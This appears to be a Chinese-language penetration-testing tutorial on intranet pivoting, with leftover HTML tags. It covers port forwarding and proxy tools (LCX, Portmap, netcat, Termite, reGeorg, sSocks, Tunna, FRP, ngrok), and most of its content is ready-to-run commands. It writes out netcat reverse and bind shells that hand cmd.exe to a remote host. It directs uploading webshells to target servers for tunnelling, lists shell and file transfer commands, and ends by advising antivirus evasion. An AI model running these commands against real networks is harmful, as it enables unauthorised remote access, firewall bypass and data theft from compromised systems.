内网渗透之端口转发与代理工具详解<\/h1>

一、端口转发基础概念<\/h2>

在渗透测试中，当目标主机处于内网环境时，我们需要借助端口转发工具与目标主机建立通信通道。端口转发主要分为两种类型：<\/p>

端口转发<\/strong>：将内网主机的端口流量转发到公网主机的指定端口<\/li>

端口映射<\/strong>：将目标主机的受限端口映射到防火墙允许的其他端口<\/li> <\/ol>
二、LCX工具详解<\/h2>
Windows版LCX<\/h3>
1. 内网端口转发<\/h4>
操作步骤<\/strong>：<\/p>

在内网主机上执行：<\/p>
lcx.exe -slave 公网主机IP 公网主机端口内网主机IP 内网主机端口 <\/code><\/pre> 示例：将内网3389端口转发到公网主机的4444端口<\/p> lcx.exe -slave 公网主机IP 4444 127.0.0.1 3389 <\/code><\/pre> <\/li> 在公网主机上执行：<\/p> lcx.exe -listen 接收端口转发端口 <\/code><\/pre> 示例：<\/p> lcx.exe -listen 4444 5555 <\/code><\/pre> <\/li> <\/ol> 连接方式<\/strong>：<\/p> 公网主机操作：mstsc \/v:127.0.0.1:5555<\/code><\/li> 本地主机操作：mstsc \/v:公网主机IP:5555<\/code><\/li> <\/ul> 2. 本地端口转发<\/h4> 当3389端口被防火墙阻止时，可将其映射到允许的端口（如53）：<\/p> lcx -tran 53 目标主机IP 3389 <\/code><\/pre> 连接方式：mstsc \/v:目标主机IP:53<\/code><\/p> Linux版Portmap<\/h3> 公网主机执行：<\/p> .\/portmap -m 2 -p1 6666 -h2 公网主机IP -p2 7777 <\/code><\/pre> <\/li> 内网主机执行：<\/p> .\/portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机IP -p2 6666 <\/code><\/pre> <\/li> 连接方式：<\/p> ssh 公网主机IP 7777 <\/code><\/pre> <\/li> <\/ol> 三、NC工具使用<\/h2> 反向连接<\/h3> 公网主机监听：<\/p> nc -lvp 4444 <\/code><\/pre> <\/li> 内网主机执行：<\/p> nc -t -e cmd.exe 公网主机IP 4444 <\/code><\/pre> <\/li> <\/ol> 正向连接<\/h3> 远程主机执行：<\/p> nc -l -p 4444 -t -e cmd.exe <\/code><\/pre> <\/li> 本地主机连接：<\/p> nc -vv 远程主机IP 4444 <\/code><\/pre> <\/li> <\/ol> 四、Socks代理工具<\/h2> 1. Termite (EW升级版)<\/h3> 主要特性<\/strong>：<\/p> 多平台支持<\/li> 跳板机互联<\/li> 正反向级联<\/li> 内置Shell管理<\/li> <\/ul> 使用方法<\/strong>：<\/p> 客户端执行：<\/p> agent_windows_x86.exe -l 4444 <\/code><\/pre> <\/li> 管理端执行：<\/p> admin_windows_x86.exe -c 127.0.0.1 -p 4444 <\/code><\/pre> <\/li> 添加新agent：<\/p> agent_windows_x86.exe -c 127.0.0.1 -p 4444 <\/code><\/pre> <\/li> <\/ol> 常用命令<\/strong>：<\/p> show<\/code>：查看拓扑结构<\/li> goto [节点ID]<\/code>：切换管理节点<\/li> socks [端口]<\/code>：开启Socks代理<\/li> shell [端口]<\/code>：绑定Shell到端口<\/li> downfile [远程文件] [本地文件]<\/code>：下载文件<\/li> upfile [本地文件] [远程文件]<\/code>：上传文件<\/li> lcxtran [本地端口] [目标IP] [目标端口]<\/code>：端口转发<\/li> <\/ul> 2. reGeorg<\/h3> 特点<\/strong>：<\/p> 通过HTTP\/HTTPS隧道转发内网端口<\/li> 需要目标服务器支持aspx\/php\/jsp<\/li> <\/ul> 使用方法<\/strong>：<\/p> 上传对应webshell到目标服务器<\/li> 本地执行： python proxy.py -u <webshell地址> -l <本地端口> [选项] <\/code><\/pre> <\/li> <\/ol> 3. sSocks<\/h3> 组件功能<\/strong>：<\/p> nsocks<\/code>：类似通过Socks5代理的netcat<\/li> ssocksd<\/code>：开启Socks5代理服务<\/li> ssocks<\/code>：本地启用Socks5服务并反弹<\/li> rcsocks<\/code>：接收反弹的Socks5服务<\/li> <\/ul> 使用方法<\/strong>：<\/p> 公网主机执行：<\/p> .\/rcsocks -l 4444 -p 5555 -vv <\/code><\/pre> <\/li> 内网主机执行：<\/p> .\/rssocks -vv -s 公网主机IP:5555 <\/code><\/pre> <\/li> <\/ol> 4. proxychains<\/h3> 特点<\/strong>：<\/p> Linux平台全局代理工具<\/li> 支持HTTP\/SOCKS4\/SOCKS5代理<\/li> 支持代理链<\/li> <\/ul> 安装<\/strong>：<\/p> sudo apt-get update sudo apt-get install proxychains <\/code><\/pre> 5. Tunna<\/h3> 使用前提<\/strong>：<\/p> 能够在远程服务器上传webshell<\/li> <\/ul> 使用方法<\/strong>：<\/p> python proxy.py -u http:\/\/10.3.3.1\/test\/conn.aspx -l 4444 -r 3389 -v <\/code><\/pre> 五、FRP内网穿透<\/h2> 特点<\/strong>：<\/p> 高性能反向代理<\/li> 支持TCP\/UDP\/HTTP\/HTTPS<\/li> 支持虚拟主机和自定义域名<\/li> <\/ul> 服务端配置示例<\/strong> (frps.ini<\/code>)：<\/p> [common]<\/span> <\/span><\/span>bind_port<\/span> =<\/span> 7000<\/span> <\/span><\/span>vhost_http_port<\/span> =<\/span> 80<\/span> <\/span><\/span>dashboard_port<\/span> =<\/span> 7500<\/span> <\/span><\/span>dashboard_user<\/span> =<\/span> admin<\/span> <\/span><\/span>dashboard_pwd<\/span> =<\/span> password<\/span> <\/span><\/span><\/code><\/pre>客户端配置示例<\/strong> (frpc.ini<\/code>)：<\/p> [common]<\/span> <\/span><\/span>server_addr<\/span> =<\/span> xxx<\/span> <\/span><\/span>server_port<\/span> =<\/span> 7000<\/span> <\/span><\/span> <\/span><\/span>[ssh]<\/span> <\/span><\/span>type<\/span> =<\/span> tcp<\/span> <\/span><\/span>local_port<\/span> =<\/span> 22<\/span> <\/span><\/span>remote_port<\/span> =<\/span> 5555<\/span> <\/span><\/span><\/code><\/pre>启动命令<\/strong>：<\/p> 服务端：frps.exe -c frps.ini<\/code><\/li> 客户端：frpc.exe -c frpc.ini<\/code><\/li> <\/ul> 六、ngrok内网穿透<\/h2> 使用方法<\/strong>：<\/p> 内网主机启动服务：<\/p> python -m SimpleHTTPServer 8089 <\/code><\/pre> <\/li> 启动ngrok：<\/p> ngrok.exe http 8089 <\/code><\/pre> <\/li> 访问生成的ngrok地址（如http:\/\/xxxx.ngrok.io<\/code>）<\/p> <\/li> <\/ol> 七、总结<\/h2> 本文详细介绍了内网渗透中常用的端口转发和代理工具，包括：<\/p> LCX\/Portmap<\/strong>：基础端口转发工具<\/li> NC<\/strong>：简单反向Shell工具<\/li> Socks代理套件<\/strong>：Termite、reGeorg、sSocks等<\/li> FRP<\/strong>：高性能反向代理<\/li> ngrok<\/strong>：便捷的内网穿透工具<\/li> <\/ol> 在实际渗透测试中，应根据目标环境选择合适的工具组合，注意工具的免杀处理和网络环境限制。<\/p>